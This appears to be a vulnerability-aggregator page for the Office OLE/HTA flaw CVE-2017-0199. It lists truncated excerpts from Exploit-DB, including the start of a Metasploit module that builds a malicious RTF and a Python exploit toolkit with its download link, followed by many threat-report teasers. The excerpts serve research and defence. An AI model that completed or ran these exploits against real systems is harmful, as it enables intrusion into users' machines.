MS Excel contains a remote code execution vulnerability upon processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it has been patched together, 'silently'. By performing some tests from the Word HTA PoC posted
on exploit-db[dot]com, it's possible to exploit it through Excel too, however the target would ne
Exploit-DB
Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)
exploitdb·2017-04-25
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => "Microsoft Office Word Malicious Hta Execution",
      'Description' => %q{
        This module creates a malicious RTF file that when opened in
        vulnerable versions of Microsoft Word will lead to code execution.
        The flaw exists in how a olelink object can make a http(s) request,
        and execute hta code in response.

        This bug was originally seen being exploited in the wild starting
        in Oct 2016. This module was created by reversing a public
        malware sample.
      },
      'Author' =>
        [
          'Haifei Li', # vulnerability analysis
          'ryHanson',
          'wdormann',
          'DidierStevens',
          'vysec
Exploit-DB
Microsoft Word - '.RTF' Remote Code Execution
exploitdb·2017-04-18·CVSS 7.8
---
#!/usr/bin/env python
'''
## Exploit toolkit CVE-2017-0199 - v4.0 (https://github.com/bhdresh/CVE-2017-0199) ##
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41894.zip
'''
# Python 2 toolkit (the 'thread' module and the RTF/HTA server it runs are Python 2 code)
import os, sys, thread, socket, getopt, binascii, shutil, tempfile
from random import randint
from random import choice
from string import ascii_uppercase
from zipfile import ZipFile, ZIP_STORED, ZipInfo

BACKLOG = 50            # how many pending connections queue will hold
MAX_DATA_RECV = 999999  # max number of bytes we receive at once
DEBUG = True            # set to True to see the debug msgs

def main(argv):
    # Host and Port information
    global port
    global host
    global filename
    global docuri
    global payloadurl
    global payloadlocation
    global custom
Metasploit
Microsoft Office Word Malicious Hta Execution
metasploit
This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a olelink object can make a http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample.
Tenable
Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
blogs_tenable·2026-05-27
CVE-2023-4966 Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
Tenable Research has developed a graph-based model linking 600+ threat groups to real-world customer exposures. It reveals which vulnerabilities sit at the intersection of severity, active exploit
Securelist
Exploits and vulnerabilities in Q1 2026
blogs_securelist·2026-05-07·CVSS 7.8
CVE-2026-21519 [HIGH] Exploits and vulnerabilities in Q1 2026
Alexander Kolesnikov
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Notable vulnerabilities
CVE-2026-21519: Desktop Window Manager vulnerability
RegPwn (CVE-2026-21533): a system settings access control vulnerability
CVE-2026-21514: a Microsoft Office vulnerability
Clawdbot (CVE-2026-25253): an OpenClaw vulnerability
CVE-2026-34070: LangChain framework vulnerability
CVE-2026-22812: an OpenCode vulnerability
Conclusion and advice
Authors
Alexander Kolesnikov
During Q1 2026, the exploit kits leveraged by threat actors to target user systems expanded once again, incorporating new exploits for the Microsoft Off
Securelist
Vulnerability landscape in Q4 2025
blogs_securelist·2026-03-06
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- C2 frameworks
- Notable vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vulnerability disclosures, hitting popular libraries and mainstream applications. Several of these vulnerabilities were picked up by attackers and exploited in the wild almost immediately.
In this report, we dive into the statistics on published vulnerabilities and exploits, as well as the known vulnerabilities leveraged with popular C2 frameworks throughout Q4 2025.
## Statistics on registered vulnerabilities
This section contains statistics on regis
Securelist
Exploits and vulnerabilities in Q4 2025
blogs_securelist·2026-03-06·CVSS 7.8
CVE-2025-55182 [HIGH] Exploits and vulnerabilities in Q4 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Notable vulnerabilities
React2Shell (CVE-2025-55182): a vulnerability in React Server Components
CVE-2025-54100: command injection during the execution of curl (Invoke-WebRequest)
CVE-2025-11001: a vulnerability in 7-Zip
RediShell (CVE-2025-49844): a vulnerability in Redis
CVE-2025-24990: a vulnerability in the ltmdm64.sys driver
CVE-2025-59287: a vulnerability in Windows Server Update Services (WSUS)
Conclusion and advice
Authors
Alexander Kolesnikov
The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vul
Securelist
Exploits and vulnerabilities in Q3 2025
blogs_securelist·2025-12-03·CVSS 7.8
CVE-2025-49704 [HIGH] Exploits and vulnerabilities in Q3 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Interesting vulnerabilities
ToolShell (CVE-2025-49704 and CVE-2025-49706, CVE-2025-53770 and CVE-2025-53771): insecure deserialization and an authentication bypass
CVE-2025-8088: a directory traversal vulnerability in WinRAR
CVE-2025-41244: a privilege escalation vulnerability in VMware Aria Operations and VMware Tools
Conclusion and advice
Authors
Alexander Kolesnikov
In the third quarter, attackers continued to exploit security flaws in WinRAR, while the total number of registered vulnerabilities grew again. In this report, we examine statistics on published vuln
Securelist
Analyzing the vulnerability landscape in Q3 2025
blogs_securelist·2025-12-03
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- C2 frameworks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
In the third quarter, attackers continued to exploit security flaws in WinRAR, while the total number of registered vulnerabilities grew again. In this report, we examine statistics on published vulnerabilities and exploits, the most common security issues impacting Windows and Linux, and the vulnerabilities being leveraged in APT attacks that lead to the launch of widespread C2 frameworks. The report utilizes anonymized Kaspersky Security Network data, which was consensually provided by our users, as well as information from open sources.
## Statistics on
Securelist
A new RevengeHotels campaign targets Latin America
blogs_securelist·2025-09-16·CVSS 7.8
[HIGH] A new RevengeHotels campaign targets Latin America
Table of Contents
- Background
- Initial infection
- Malicious implant
- Second loading step
- Exploring VenomRAT
- Victimology
- Conclusions
- Indicators of compromise
Authors
- Lisandro Ubiedo
## Background
RevengeHotels, also known as TA558, is a threat group that has been active since 2015, stealing credit card data from hotel guests and travelers. RevengeHotels’ modus operandi involves sending emails with phishing links which redirect victims to websites mimicking document storage. These sites, in turn, download script files to ultimately infect the targeted machines. The final payloads consist of various remote access Trojan (RAT) implants, which enable the threat actor to issue commands for controlling compromised systems, stealing sensitive data, and maintaining persistence,
Securelist
RevengeHotels: a new wave of attacks leveraging LLMs and VenomRAT
blogs_securelist·2025-09-16·CVSS 7.8
[HIGH] RevengeHotels: a new wave of attacks leveraging LLMs and VenomRAT
Table of Contents
Background
Initial infection
Malicious implant
Second loading step
Exploring VenomRAT
Anti-kill
Networking
USB spreading
Extra stealth steps
Victimology
Conclusions
Indicators of compromise
Authors
Lisandro Ubiedo
## Background
RevengeHotels, also known as TA558, is a threat group that has been active since 2015, stealing credit card data from hotel guests and travelers. RevengeHotels’ modus operandi involves sending emails with phishing links which redirect victims to websites mimicking document storage. These sites, in turn, download script files to ultimately infect the targeted machines. The final payloads consist of various remote access Trojan (RAT) implants, which enable the threat actor to issue commands for controlling compromised systems, stealin
Securelist
Exploits and vulnerabilities in Q2 2025
blogs_securelist·2025-08-27·CVSS 8.2
CVE-2025-32433 [HIGH] Exploits and vulnerabilities in Q2 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Interesting vulnerabilities
CVE-2025-32433: vulnerability in the SSH server, part of the Erlang/OTP framework
CVE-2025-6218: directory traversal vulnerability in WinRAR
CVE-2025-3052: insecure data access vulnerability in NVRAM, allowing bypass of UEFI signature checks
CVE-2025-49113: insecure deserialization vulnerability in Roundcube Webmail
CVE-2025-1533: stack overflow vulnerability in the AsIO3.sys driver
Conclusion and advice
Authors
Alexander Kolesnikov
Vulnerability registrations in Q2 2025 proved to be quite dynamic. Vulnerabilities that were published i
Securelist
Vulnerability landscape analysis for Q2 2025
blogs_securelist·2025-08-27
Vulnerability landscape analysis for Q2 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- C2 frameworks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
Vulnerability registrations in Q2 2025 proved to be quite dynamic. Vulnerabilities that were published impact the security of nearly every computer subsystem: UEFI, drivers, operating systems, browsers, as well as user and web applications. Based on our analysis, threat actors continue to leverage vulnerabilities in real-world attacks as a means of gaining access to user systems, just like in previous periods.
This report also describes known vulnerabilities used with popular C2 frameworks during the first half of 2025.
## Statistics on registered vulnera
Fortinet
How a Malicious Excel File (CVE-2017-0199) Delivers the FormBook Payload | FortiGuard Labs
blogs_fortinet·2025-06-05·CVSS 7.8
CVE-2017-0199 [HIGH] How a Malicious Excel File (CVE-2017-0199) Delivers the FormBook Payload | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
How a Malicious Excel File (CVE-2017-0199) Delivers the FormBook Payload
FORTIGUARD SECURITY PORTFOLIO 2025 THREAT LANDSCAPE REPORT
Phishing Email Initialization
CVE-2017-0199
Malicious HTA file
“sihost.exe”
AutoIt Script
Summary
Fortinet Protections
IOCs
By Shiyin Lin | June 05, 2025
Affected platforms: Microsoft Windows
Impacted parties: Windows Users
Impact: Control and Collect Sensitive Information from a Victim’s Device
Severity level: Critical
FortiGuard Labs recently observed a high-severity phishing campaign targeting old version Office Application users through malicious email attachments. The emails deliver an Excel file designed to exploit the CVE-2017-0199 vulnerability, a known flaw in old version Microsoft Office's OLE (Object Linking and Em
Securelist
Vulnerability landscape analysis for Q1 2025
blogs_securelist·2025-05-30
Vulnerability landscape analysis for Q1 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
The first quarter of 2025 saw the continued publication of vulnerabilities discovered and fixed in 2024, as some researchers were previously unable to disclose the details. This partially shifted the focus away from vulnerabilities that received new CVE-2025-NNNNN identifiers. The nature of the CVE assignment process can result in a notable delay between problem investigation and patch release, which is mitigated by reserving a CVE ID early in the process. As for trends in vulnerability exploitation, we are seeing increasing rates of attacks targeting older operating syste
Securelist
Exploits and vulnerabilities in Q1 2025
blogs_securelist·2025-05-30·CVSS 7.8
CVE-2025-21333 [HIGH] Exploits and vulnerabilities in Q1 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
ZDI-CAN-25373: a vulnerability in Windows that affects how LNK files are displayed
CVE-2025-21333: a heap buffer overflow vulnerability in the vkrnlintvsp.sys driver
CVE-2025-24071: a NetNTLM hash leakage vulnerability in the file system indexer
Conclusion and advice
Authors
Alexander Kolesnikov
The first quarter of 2025 saw the continued publication of vulnerabilities discovered and fixed in 2024, as some researchers were previously unable to disclose the details. This partially shifted the focus away from vulnerabilities that received new CVE-2025-NN
Securelist
Vulnerability landscape analysis for Q4 2024
blogs_securelist·2025-02-26
Vulnerability landscape analysis for Q4 2024
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
Q4 2024 saw fewer published exploits for Windows and Linux compared to the first three quarters. Although the number of registered vulnerabilities continued to rise, the total number of Proof of Concept (PoC) instances decreased compared to 2023. Among notable techniques in Q4, attackers leveraged undocumented RPC interfaces and targeted the Windows authentication mechanism.
## Statistics on registered vulnerabilities
This section contains statistics on registered vulnerabilities. Data is sourced from the CVE portal: cve.org.
Total number of registered vulnerabilities a
Securelist
Exploits and vulnerabilities in Q4 2024
blogs_securelist·2025-02-26·CVSS 6.5
CVE-2024-43572 [MEDIUM] Exploits and vulnerabilities in Q4 2024
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
CVE-2024-43572—Remote code execution vulnerability in Microsoft Management Console
CVE-2024-43451—NetNTLM hash disclosure vulnerability
CVE-2024-49039—Elevation of privilege vulnerability in Windows Task Scheduler
Conclusion and advice
Authors
Alexander Kolesnikov
Q4 2024 saw fewer published exploits for Windows and Linux compared to the first three quarters. Although the number of registered vulnerabilities continued to rise, the total number of Proof of Concept (PoC) instances decreased compared to 2023. Among notable techniques in Q4, attackers leve
Dfir Report
Confluence Exploit Leads to LockBit Ransomware
blogs_dfir_report·2025-02-24·CVSS 9.8
[CRITICAL] Confluence Exploit Leads to LockBit Ransomware
Securelist
Exploits and vulnerabilities in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Exploits and vulnerabilities in Q3 2024
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most prevalent exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
CVE-2024-47177 (CUPS filters)
CVE-2024-38112 (MSHTML Spoofing)
CVE-2024-6387 (regreSSHion)
CVE-2024-3183 (Free IPA)
CVE-2024-45519 (Zimbra)
CVE-2024-5290 (Ubuntu wpa_supplicant)
Conclusion and advice
Authors
Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Co
Securelist
Analyzing the vulnerability landscape in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Analyzing the vulnerability landscape in Q3 2024
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- CVE-2024-47177 (CUPS filters)
- CVE-2024-38112 (MSHTML Spoofing)
- CVE-2024-6387 (regreSSHion)
- CVE-2024-3183 (Free IPA)
- CVE-2024-45519 (Zimbra)
- CVE-2024-5290 (Ubuntu wpa_supplicant)
- Conclusion and advice
Authors
- Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Common Log Filing System (CLFS) in Windows, so the number
Fortinet
SmokeLoader Attack Targets Companies in Taiwan | FortiGuard Labs
blogs_fortinet·2024-12-02·CVSS 7.8
[HIGH] SmokeLoader Attack Targets Companies in Taiwan | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
SmokeLoader Attack Targets Companies in Taiwan
By Pei Han Liao | December 02, 2024
Affected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: The stolen information can be used for future attack
Severity Level: High
In September 2024, FortiGuard Labs observed an attack using the notorious SmokeLoader malware to target companies in Taiwan, including those in manufacturing, healthcare, information technology, and other sectors. SmokeLoader is well-known for its versatility and advanced evasion techniques, and its modular design allows it to perform a wide range of attacks. While SmokeLoader primarily serves as a downloader to deliver other malware, in this case, it carries out the attack itself by downloading plugins from its C2 server
Fortinet
New Campaign Uses Remcos RAT to Exploit Victims | FortiGuard Labs
blogs_fortinet·2024-11-08·CVSS 7.8
CVE-2017-0199 [HIGH] New Campaign Uses Remcos RAT to Exploit Victims | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
New Campaign Uses Remcos RAT to Exploit Victims
Overview
The Phishing Email
CVE-2017-0199 Exploited by the Excel Document
Multiple Script Languages
Starting the Downloaded EXE
Malicious Code Runs Inside the PowerShell Process
Malicious Code Runs inside Vaccinerende.exe
Initializing Remcos
Features and Control Commands
Summary
Fortinet Protections
IOCs
By Xiaopeng Zhang | November 08, 2024
Affected platforms: Microsoft Windows
Impacted parties: Windows Users
Impact: Fully remotely control a victim’s computer
Severity level: High
Fortinet’s FortiGuard Labs recently noticed a phishing campaign in the wild. It is initialized with a phishing email containing a malicious Excel document. Upon researching the campaign, I found it was spreading a new variant of th
Fortinet
Deep Analysis of Snake Keylogger’s New Variant | FortiGuard Labs
blogs_fortinet·2024-08-28
Deep Analysis of Snake Keylogger’s New Variant | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Deep Analysis of Snake Keylogger’s New Variant
Snake Keylogger Overview
The Phishing Email
The Malicious Excel Document
VBScript Code & PowerShell Code
Dive into the Loader-Module
Dissecting the Deploy Module
Snake Keylogger Core Module and Features
Credentials Collection
Stolen Credentials Submitted Over SMTP
Snake Keylogger Summary
Fortinet Protections
IOCs
URLs
Relevant Sample SHA-256
By Xiaopeng Zhang | August 28, 2024
Affected platforms: Microsoft Windows
Impacted parties: Windows Users
Impact: Collects sensitive information from the victim’s computer
Severity level: High
Fortinet’s FortiGuard Labs recently caught a phishing campaign in the wild with a malicious Excel document attached to the phishing email. We performed a deep analysis on the campai
Securelist
Exploits and vulnerabilities in Q2 2024
blogs_securelist·2024-08-21·CVSS 7.8
CVE-2024-26169 [HIGH] Exploits and vulnerabilities in Q2 2024
Table of Contents
Statistics on registered vulnerabilities
Vulnerability exploitation statistics
Windows and Linux vulnerability exploitation
Most common exploits
Vulnerability exploitation in APT attacks
Exploiting vulnerable drivers to attack operating systems
BYOVD attack tools
Interesting vulnerabilities
CVE-2024-26169 (WerKernel.sys)
CVE-2024-26229 (csc.sys)
CVE-2024-4577 (PHP CGI)
Takeaways and recommendations
Authors
Vitaly Morgunov
Alexander Kolesnikov
Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not h
Securelist
Analyzing the vulnerability landscape in Q2 2024
blogs_securelist·2024-08-21·CVSS 7.8
CVE-2024-26169 [HIGH] Analyzing the vulnerability landscape in Q2 2024
Table of Contents
- Statistics on registered vulnerabilities
- Vulnerability exploitation statistics
- Vulnerability exploitation in APT attacks
- Exploiting vulnerable drivers to attack operating systems
- Interesting vulnerabilities
- CVE-2024-26169 (WerKernel.sys)
- CVE-2024-26229 (csc.sys)
- CVE-2024-4577 (PHP CGI)
- Takeaways and recommendations
Authors
- Vitaly Morgunov
- Alexander Kolesnikov
Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not have to be fresh, since attackers themselves deliver unpatched drivers to t
Fortinet
A Deep Dive into a New ValleyRAT Campaign Targeting Chinese Speakers | FortiGuard Labs
blogs_fortinet·2024-08-15
A Deep Dive into a New ValleyRAT Campaign Targeting Chinese Speakers | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
A Deep Dive into a New ValleyRAT Campaign Targeting Chinese Speakers
First Stage Loader
Beaconing Module
AV Evasion
RuntimeBroker
Updated Loader
RemoteShellCode
Payload Downloader
ValleyRAT
Conclusion
Fortinet Protections
IOCs
By Eduardo Altares and Joie Salvio | August 15, 2024
Affected platforms: Microsoft Windows
Impacted parties: Targeted Windows users
Impact: Compromised machines are under the control of the threat actor
Severity level: Medium
FortiGuard Labs recently encountered an ongoing ValleyRAT campaign specifically targeting Chinese speakers. This malware has historically targeted e-commerce, finance, sales, and management enterprises.
ValleyRAT is a multi-stage malware that utilizes diverse techniques to monitor and control its victims and d
Fortinet
New Agent Tesla Campaign Targeting Spanish-Speaking People | FortiGuard Labs
blogs_fortinet·2024-06-07·CVSS 7.8
CVE-2017-11882 [HIGH] New Agent Tesla Campaign Targeting Spanish-Speaking People | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
New Agent Tesla Campaign Targeting Spanish-Speaking People
The Phishing Email
The Excel Document
CVE-2017-11882 is Exploited
JavaScript Files Lead to Execute PowerShell Code
A Look into the Loader-Module
Agent Tesla Executable Module
Sensitive Information Stolen from the Victim Device
Submitting Stolen Data to an FTP Server
Summary
Fortinet Protections
IOCs
URLs
FTP Server List
Relevant Sample SHA-256
By Xiaopeng Zhang | June 07, 2024
Affected Platforms: Microsoft Windows
Impacted Users: Windows Users
Impact: Collects sensitive information from a victim’s computer
Severity Level: Critical
A new phishing campaign was recently captured by our FortiGuard Labs that spreads a new Agent Tesla variant targeting Spanish-speaking people.
Security researchers have
Fortinet
Menace Unleashed: Excel File Deploys Cobalt Strike at Ukraine | FortiGuard Labs
blogs_fortinet·2024-06-03
Menace Unleashed: Excel File Deploys Cobalt Strike at Ukraine | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Menace Unleashed: Excel File Deploys Cobalt Strike at Ukraine
Excel Document
DLL Downloader
DLL Injector
The Cobalt Strike Payload
Conclusion
Fortinet Protections
IOCs
By Cara Lin | June 03, 2024
Affected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: Compromised machines are under the control of the threat actor
Severity Level: High
FortiGuard Labs has recently identified a sophisticated cyberattack involving an Excel file embedded with a VBA macro designed to deploy a DLL file. The attacker uses a multi-stage malware strategy to deliver the notorious "Cobalt Strike" payload and establish communication with a command and control (C2) server. This attack employs various evasion techniques to ensure successful payload delivery.
Ove
Checkpoint
12th February – Threat Intelligence Report
blogs_checkpoint·2024-02-12
CVE-2022-42475 12th February – Threat Intelligence Report
## 12th February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 12th February, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
One of the largest unions in California, Service Employees International Union (SEIU) Local 1000, has confirmed a ransomware attack that led to network disruption. The LockBit ransomware gang has assumed responsibility, claiming to have stolen 308GB of data including sensitive employee information such as Social Securit
Checkpoint
Maldocs of Word and Excel: Vigor of the Ages
blogs_checkpoint·2024-02-08·CVSS 7.8
CVE-2017-11882 [HIGH] Maldocs of Word and Excel: Vigor of the Ages
## Maldocs of Word and Excel: Vigor of the Ages
Research by: Raman Ladutska
We chose a fantasy decoration style at certain points of the article to attract attention to the described proble
Securelist
PC malware statistics, Q3 2023
blogs_securelist·2023-12-01
PC malware statistics, Q3 2023
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q3 2023
- IT threat evolution in Q3 2023. Non-mobile statistics
- IT threat evolution in Q3 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2023:
- Kaspersky solutions blocked 694,400,301 attacks from online resources across the globe.
- A total of 169,194,807 unique links were recognized as malicious by Web Anti-Virus
Securelist
Kaspersky malware report for Q3 2023
blogs_securelist·2023-12-01·CVSS 9.8
[CRITICAL] Kaspersky malware report for Q3 2023
Table of Contents
- Targeted attacks
- Other malware
Authors
- David Emm
- IT threat evolution in Q3 2023
- IT threat evolution in Q3 2023. Non-mobile statistics
- IT threat evolution in Q3 2023. Mobile statistics
## Targeted attacks
### Unknown threat actor targets power generator with DroxiDat and Cobalt Strike
Earlier this year, we reported on a new variant of SystemBC called DroxiDat that was deployed against a critical infrastructure target in South Africa. This proxy-capable backdoor was deployed alongside Cobalt Strike beacons.
The incident occurred in the third and fourth week of March, as part of a small wave of attacks involving both DroxiDat and Cobalt Strike beacons around the world; and we believe this incident may have been the initial stage of a ransomware attack.
D
Securelist
IT threat evolution in Q3 2023. Non-mobile statistics
blogs_securelist·2023-12-01
IT threat evolution in Q3 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Vulnerability exploitation
More attacks on healthcare
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT honeypots
Attacks via web resources
Countries and territories that serve as sourc
Securelist
IT threat evolution Q3 2023
blogs_securelist·2023-12-01·CVSS 9.8
CVE-2023-23397 [CRITICAL] IT threat evolution Q3 2023
Table of Contents
Targeted attacks
Unknown threat actor targets power generator with DroxiDat and Cobalt Strike
Analysis of samples exploiting CVE-2023-23397 vulnerability
Common TTPs in attacks on industrial organizations
Evil Telegram doppelganger used to target people in China
Other malware
Possible supply-chain attack on Linux machines
The Cuba ransomware gang
Leaked Lockbit 3 builder
The evolving world of crimeware
A cryptor, a stealer and a banking Trojan
Authors
David Emm
IT threat evolution in Q3 2023
IT threat evolution in Q3 2023. Non-mobile statistics
IT threat evolution in Q3 2023. Mobile statistics
## Targeted attacks
## Unknown threat actor targets power generator with DroxiDat and Cobalt Strike
Earlier this year, we reported on a new variant of SystemBC ca
Qualys
Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
#### Table of Contents
- Stats on the Top 20 Vulnerable Vendors & By-Products
- Top Twenty Most Targeted by Attackers
- TruRisk Dashboard
- Key Insights & Takeaways
- References
- Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the curre
Qualys
Qualys Top 20 Most Exploited Vulnerabilities
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Qualys Top 20 Most Exploited Vulnerabilities
## Table of Contents
Stats on the Top 20 Vulnerable Vendors & By-Products
Top Twenty Most Targeted by Attackers
TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Securelist
IT threat evolution in Q2 2023. Non-mobile statistics
blogs_securelist·2023-08-30
IT threat evolution in Q2 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
MOVEit Transfer vulnerabilities exploited
Attacks on municipal organizations, educational and healthcare establishments
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT
Securelist
PC malware statistics, Q2 2022
blogs_securelist·2023-08-30
PC malware statistics, Q2 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q2 2023
- IT threat evolution in Q2 2023. Non-mobile statistics
- IT threat evolution in Q2 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2023:
- Kaspersky solutions blocked 801,934,281 attacks from online resources across the globe.
- A total of 209,716,810 unique links were d
Securelist
What’s happening in the world of crimeware: Emotet, DarkGate and LokiBot
blogs_securelist·2023-08-03
What’s happening in the world of crimeware: Emotet, DarkGate and LokiBot
Table of Contents
Introduction
DarkGate
LokiBot
Emotet
Conclusion
Indicators of compromise (MD5s)
Authors
GReAT
## Introduction
The malware landscape keeps evolving. New families are born, while others disappear. Some families are short-lived, while others remain active for quite a long time. In order to follow this evolution, we rely both on samples that we detect and our monitoring efforts, which cover botnets and underground forums.
While doing so, we found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. We described all three in private reports, from which this post contains an excerpt.
If you want to learn more about our crimeware reporting service, please contact us at [email protected].
## DarkGate
In June 2023, a
Tenable
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
blogs_tenable·2023-08-03
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
Securelist
Kaspersky crimeware report: Emotet, DarkGate and LokiBot
blogs_securelist·2023-08-03
Kaspersky crimeware report: Emotet, DarkGate and LokiBot
Table of Contents
- Introduction
- DarkGate
- LokiBot
- Emotet
- Conclusion
- Indicators of compromise (MD5s)
Authors
- GReAT
## Introduction
The malware landscape keeps evolving. New families are born, while others disappear. Some families are short-lived, while others remain active for quite a long time. In order to follow this evolution, we rely both on samples that we detect and our monitoring efforts, which cover botnets and underground forums.
While doing so, we found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. We described all three in private reports, from which this post contains an excerpt.
